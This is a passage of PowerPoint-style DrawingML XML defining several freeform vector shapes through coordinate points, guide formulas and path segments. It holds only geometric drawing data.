                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="336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5" name="Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7196138" y="2498725"/>
                <a:ext cx="209550" cy="182563"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 200 w 584"/>
                  <a:gd name="T1" fmla="*/ 221 h 505"/>
                  <a:gd name="T2" fmla="*/ 158 w 584"/>
                  <a:gd name="T3" fmla="*/ 247 h 505"/>
                  <a:gd name="T4" fmla="*/ 126 w 584"/>
                  <a:gd name="T5" fmla="*/ 278 h 505"/>
                  <a:gd name="T6" fmla="*/ 110 w 584"/>
                  <a:gd name="T7" fmla="*/ 310 h 505"/>
                  <a:gd name="T8" fmla="*/ 110 w 584"/>
                  <a:gd name="T9" fmla="*/ 325 h 505"/>
                  <a:gd name="T10" fmla="*/ 116 w 584"/>
                  <a:gd name="T11" fmla="*/ 347 h 505"/>
                  <a:gd name="T12" fmla="*/ 136 w 584"/>
                  <a:gd name="T13" fmla="*/ 368 h 505"/>
                  <a:gd name="T14" fmla="*/ 168 w 584"/>
                  <a:gd name="T15" fmla="*/ 378 h 505"/>
                  <a:gd name="T16" fmla="*/ 200 w 584"/>
                  <a:gd name="T17" fmla="*/ 378 h 505"/>
                  <a:gd name="T18" fmla="*/ 310 w 584"/>
                  <a:gd name="T19" fmla="*/ 478 h 505"/>
                  <a:gd name="T20" fmla="*/ 263 w 584"/>
                  <a:gd name="T21" fmla="*/ 494 h 505"/>
                  <a:gd name="T22" fmla="*/ 189 w 584"/>
                  <a:gd name="T23" fmla="*/ 504 h 505"/>
                  <a:gd name="T24" fmla="*/ 153 w 584"/>
                  <a:gd name="T25" fmla="*/ 498 h 505"/>
                  <a:gd name="T26" fmla="*/ 89 w 584"/>
                  <a:gd name="T27" fmla="*/ 462 h 505"/>
                  <a:gd name="T28" fmla="*/ 37 w 584"/>
                  <a:gd name="T29" fmla="*/ 394 h 505"/>
                  <a:gd name="T30" fmla="*/ 21 w 584"/>
                  <a:gd name="T31" fmla="*/ 357 h 505"/>
                  <a:gd name="T32" fmla="*/ 0 w 584"/>
                  <a:gd name="T33" fmla="*/ 299 h 505"/>
                  <a:gd name="T34" fmla="*/ 0 w 584"/>
                  <a:gd name="T35" fmla="*/ 273 h 505"/>
                  <a:gd name="T36" fmla="*/ 11 w 584"/>
                  <a:gd name="T37" fmla="*/ 226 h 505"/>
                  <a:gd name="T38" fmla="*/ 32 w 584"/>
                  <a:gd name="T39" fmla="*/ 184 h 505"/>
                  <a:gd name="T40" fmla="*/ 63 w 584"/>
                  <a:gd name="T41" fmla="*/ 147 h 505"/>
                  <a:gd name="T42" fmla="*/ 106 w 584"/>
                  <a:gd name="T43" fmla="*/ 116 h 505"/>
                  <a:gd name="T44" fmla="*/ 195 w 584"/>
                  <a:gd name="T45" fmla="*/ 63 h 505"/>
                  <a:gd name="T46" fmla="*/ 294 w 584"/>
                  <a:gd name="T47" fmla="*/ 16 h 505"/>
                  <a:gd name="T48" fmla="*/ 342 w 584"/>
                  <a:gd name="T49" fmla="*/ 5 h 505"/>
                  <a:gd name="T50" fmla="*/ 389 w 584"/>
                  <a:gd name="T51" fmla="*/ 0 h 505"/>
                  <a:gd name="T52" fmla="*/ 436 w 584"/>
                  <a:gd name="T53" fmla="*/ 10 h 505"/>
                  <a:gd name="T54" fmla="*/ 478 w 584"/>
                  <a:gd name="T55" fmla="*/ 31 h 505"/>
                  <a:gd name="T56" fmla="*/ 499 w 584"/>
                  <a:gd name="T57" fmla="*/ 47 h 505"/>
                  <a:gd name="T58" fmla="*/ 536 w 584"/>
                  <a:gd name="T59" fmla="*/ 89 h 505"/>
                  <a:gd name="T60" fmla="*/ 557 w 584"/>
                  <a:gd name="T61" fmla="*/ 121 h 505"/>
                  <a:gd name="T62" fmla="*/ 583 w 584"/>
                  <a:gd name="T63" fmla="*/ 200 h 505"/>
                  <a:gd name="T64" fmla="*/ 583 w 584"/>
                  <a:gd name="T65" fmla="*/ 221 h 505"/>
                  <a:gd name="T66" fmla="*/ 562 w 584"/>
                  <a:gd name="T67" fmla="*/ 304 h 505"/>
                  <a:gd name="T68" fmla="*/ 536 w 584"/>
                  <a:gd name="T69" fmla="*/ 341 h 505"/>
                  <a:gd name="T70" fmla="*/ 499 w 584"/>
                  <a:gd name="T71" fmla="*/ 373 h 505"/>
                  <a:gd name="T72" fmla="*/ 400 w 584"/>
                  <a:gd name="T73" fmla="*/ 436 h 505"/>
                  <a:gd name="T74" fmla="*/ 236 w 584"/>
                  <a:gd name="T75" fmla="*/ 200 h 505"/>
                  <a:gd name="T76" fmla="*/ 431 w 584"/>
                  <a:gd name="T77" fmla="*/ 257 h 505"/>
                  <a:gd name="T78" fmla="*/ 447 w 584"/>
                  <a:gd name="T79" fmla="*/ 247 h 505"/>
                  <a:gd name="T80" fmla="*/ 462 w 584"/>
                  <a:gd name="T81" fmla="*/ 231 h 505"/>
                  <a:gd name="T82" fmla="*/ 473 w 584"/>
                  <a:gd name="T83" fmla="*/ 200 h 505"/>
                  <a:gd name="T84" fmla="*/ 473 w 584"/>
                  <a:gd name="T85" fmla="*/ 178 h 505"/>
                  <a:gd name="T86" fmla="*/ 467 w 584"/>
                  <a:gd name="T87" fmla="*/ 163 h 505"/>
                  <a:gd name="T88" fmla="*/ 441 w 584"/>
                  <a:gd name="T89" fmla="*/ 137 h 505"/>
                  <a:gd name="T90" fmla="*/ 426 w 584"/>
                  <a:gd name="T91" fmla="*/ 131 h 505"/>
                  <a:gd name="T92" fmla="*/ 404 w 584"/>
                  <a:gd name="T93" fmla="*/ 126 h 505"/>
                  <a:gd name="T94" fmla="*/ 368 w 584"/>
                  <a:gd name="T95" fmla="*/ 137 h 505"/>
                  <a:gd name="T96" fmla="*/ 315 w 584"/>
                  <a:gd name="T97" fmla="*/ 157 h 505"/>
                  <a:gd name="T98" fmla="*/ 383 w 584"/>
                  <a:gd name="T99" fmla="*/ 289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84" h="505">
                    <a:moveTo>
                      <a:pt x="200" y="221"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="200" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="221"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="431" y="257"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="431" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="257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6" name="Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7273925" y="2662238"/>
                <a:ext cx="212725" cy="177800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 430 w 589"/>
                  <a:gd name="T1" fmla="*/ 258 h 495"/>
                  <a:gd name="T2" fmla="*/ 461 w 589"/>
                  <a:gd name="T3" fmla="*/ 237 h 495"/>
                  <a:gd name="T4" fmla="*/ 477 w 589"/>
                  <a:gd name="T5" fmla="*/ 205 h 495"/>
                  <a:gd name="T6" fmla="*/ 477 w 589"/>
                  <a:gd name="T7" fmla="*/ 190 h 495"/>
                  <a:gd name="T8" fmla="*/ 472 w 589"/>
                  <a:gd name="T9" fmla="*/ 174 h 495"/>
                  <a:gd name="T10" fmla="*/ 441 w 589"/>
                  <a:gd name="T11" fmla="*/ 137 h 495"/>
                  <a:gd name="T12" fmla="*/ 425 w 589"/>
                  <a:gd name="T13" fmla="*/ 132 h 495"/>
                  <a:gd name="T14" fmla="*/ 398 w 589"/>
                  <a:gd name="T15" fmla="*/ 132 h 495"/>
                  <a:gd name="T16" fmla="*/ 341 w 589"/>
                  <a:gd name="T17" fmla="*/ 147 h 495"/>
                  <a:gd name="T18" fmla="*/ 262 w 589"/>
                  <a:gd name="T19" fmla="*/ 179 h 495"/>
                  <a:gd name="T20" fmla="*/ 184 w 589"/>
                  <a:gd name="T21" fmla="*/ 216 h 495"/>
                  <a:gd name="T22" fmla="*/ 152 w 589"/>
                  <a:gd name="T23" fmla="*/ 237 h 495"/>
                  <a:gd name="T24" fmla="*/ 131 w 589"/>
                  <a:gd name="T25" fmla="*/ 253 h 495"/>
                  <a:gd name="T26" fmla="*/ 110 w 589"/>
                  <a:gd name="T27" fmla="*/ 289 h 495"/>
                  <a:gd name="T28" fmla="*/ 110 w 589"/>
                  <a:gd name="T29" fmla="*/ 305 h 495"/>
                  <a:gd name="T30" fmla="*/ 115 w 589"/>
                  <a:gd name="T31" fmla="*/ 326 h 495"/>
                  <a:gd name="T32" fmla="*/ 136 w 589"/>
                  <a:gd name="T33" fmla="*/ 352 h 495"/>
                  <a:gd name="T34" fmla="*/ 167 w 589"/>
                  <a:gd name="T35" fmla="*/ 363 h 495"/>
                  <a:gd name="T36" fmla="*/ 184 w 589"/>
                  <a:gd name="T37" fmla="*/ 363 h 495"/>
                  <a:gd name="T38" fmla="*/ 262 w 589"/>
                  <a:gd name="T39" fmla="*/ 337 h 495"/>
                  <a:gd name="T40" fmla="*/ 320 w 589"/>
                  <a:gd name="T41" fmla="*/ 462 h 495"/>
                  <a:gd name="T42" fmla="*/ 225 w 589"/>
                  <a:gd name="T43" fmla="*/ 489 h 495"/>
                  <a:gd name="T44" fmla="*/ 147 w 589"/>
                  <a:gd name="T45" fmla="*/ 489 h 495"/>
                  <a:gd name="T46" fmla="*/ 110 w 589"/>
                  <a:gd name="T47" fmla="*/ 473 h 495"/>
                  <a:gd name="T48" fmla="*/ 52 w 589"/>
                  <a:gd name="T49" fmla="*/ 410 h 495"/>
                  <a:gd name="T50" fmla="*/ 26 w 589"/>
                  <a:gd name="T51" fmla="*/ 363 h 495"/>
                  <a:gd name="T52" fmla="*/ 0 w 589"/>
                  <a:gd name="T53" fmla="*/ 268 h 495"/>
                  <a:gd name="T54" fmla="*/ 0 w 589"/>
                  <a:gd name="T55" fmla="*/ 226 h 495"/>
                  <a:gd name="T56" fmla="*/ 15 w 589"/>
                  <a:gd name="T57" fmla="*/ 190 h 495"/>
                  <a:gd name="T58" fmla="*/ 84 w 589"/>
                  <a:gd name="T59" fmla="*/ 116 h 495"/>
                  <a:gd name="T60" fmla="*/ 136 w 589"/>
                  <a:gd name="T61" fmla="*/ 79 h 495"/>
                  <a:gd name="T62" fmla="*/ 204 w 589"/>
                  <a:gd name="T63" fmla="*/ 47 h 495"/>
                  <a:gd name="T64" fmla="*/ 341 w 589"/>
                  <a:gd name="T65" fmla="*/ 0 h 495"/>
                  <a:gd name="T66" fmla="*/ 393 w 589"/>
                  <a:gd name="T67" fmla="*/ 0 h 495"/>
                  <a:gd name="T68" fmla="*/ 441 w 589"/>
                  <a:gd name="T69" fmla="*/ 6 h 495"/>
                  <a:gd name="T70" fmla="*/ 514 w 589"/>
                  <a:gd name="T71" fmla="*/ 53 h 495"/>
                  <a:gd name="T72" fmla="*/ 540 w 589"/>
                  <a:gd name="T73" fmla="*/ 90 h 495"/>
                  <a:gd name="T74" fmla="*/ 567 w 589"/>
                  <a:gd name="T75" fmla="*/ 132 h 495"/>
                  <a:gd name="T76" fmla="*/ 588 w 589"/>
                  <a:gd name="T77" fmla="*/ 216 h 495"/>
                  <a:gd name="T78" fmla="*/ 572 w 589"/>
                  <a:gd name="T79" fmla="*/ 294 h 495"/>
                  <a:gd name="T80" fmla="*/ 556 w 589"/>
                  <a:gd name="T81" fmla="*/ 326 h 495"/>
                  <a:gd name="T82" fmla="*/ 493 w 589"/>
                  <a:gd name="T83" fmla="*/ 378 h 495"/>
                  <a:gd name="T84" fmla="*/ 393 w 589"/>
                  <a:gd name="T85" fmla="*/ 279 h 495"/>
                  <a:gd name="T86" fmla="*/ 430 w 589"/>
                  <a:gd name="T87" fmla="*/ 258 h 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589" h="495">
                    <a:moveTo>
                      <a:pt x="430" y="258"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="430" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="258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7" name="Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7337425" y="2811463"/>
                <a:ext cx="231775" cy="214312"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
